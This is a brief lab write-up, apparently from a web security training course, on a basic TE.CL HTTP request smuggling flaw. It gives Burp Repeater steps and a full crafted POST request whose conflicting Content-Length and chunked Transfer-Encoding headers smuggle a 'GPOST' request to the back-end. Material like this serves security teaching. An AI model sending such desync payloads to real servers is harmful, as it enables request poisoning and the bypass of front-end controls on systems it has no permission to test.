HTTP request smuggling, basic TE.CL vulnerability

Description

This lab involves a front-end and back-end server, and the two servers handle duplicate HTTP request headers in different ways. The front-end server rejects requests that aren’t using the GET or POST method.

Reproduction and proof of concept

In Burp Suite, disable the Autoupdate content length in Repeater (in the topmost menu row)
Using Burp Repeater, issue the following request twice:

POST / HTTP/1.1
Host: lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

The second (or third) response should say: Unrecognized method GPOST.

Exploitability

An attacker will need to smuggle a request to the back-end server, so that the next request processed by the back-end server appears to use the method GPOST.